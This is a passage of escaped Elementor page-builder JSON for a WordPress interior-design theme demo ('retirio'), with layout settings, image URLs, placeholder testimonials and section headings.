center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with 